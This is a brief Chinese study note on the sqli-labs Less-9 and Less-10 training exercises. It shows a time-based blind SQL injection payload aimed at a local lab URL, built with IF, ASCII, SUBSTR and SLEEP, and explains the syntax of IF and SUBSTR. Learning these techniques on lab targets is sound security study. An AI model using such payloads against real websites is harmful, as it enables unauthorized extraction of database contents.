less 9 -less 10

时间盲注

payload

http://192.168.1.30/sqllab/Less-9/?id=1‘ and if(ascii(substr(payload,1,1))=100,sleep(5),0) --+

if 基本语法

IF(expr1,expr2,expr3)，如果expr1的值为true，则返回expr2的值，如果expr1的值为false，则返回expr3的值。就是一个简单的三目表达式。

substr基本语法

substr(string,1,3)  取左边第1位置起，3字长的字符串 str
substr(string,-1,3) 取右边第1位置起， 1字长的字符串 ,长度不够。只能取g
substr(string,-3,3) 取右边第3位置起， 3字长的字符串,ing

原文：https://www.cnblogs.com/vennus/p/12316045.html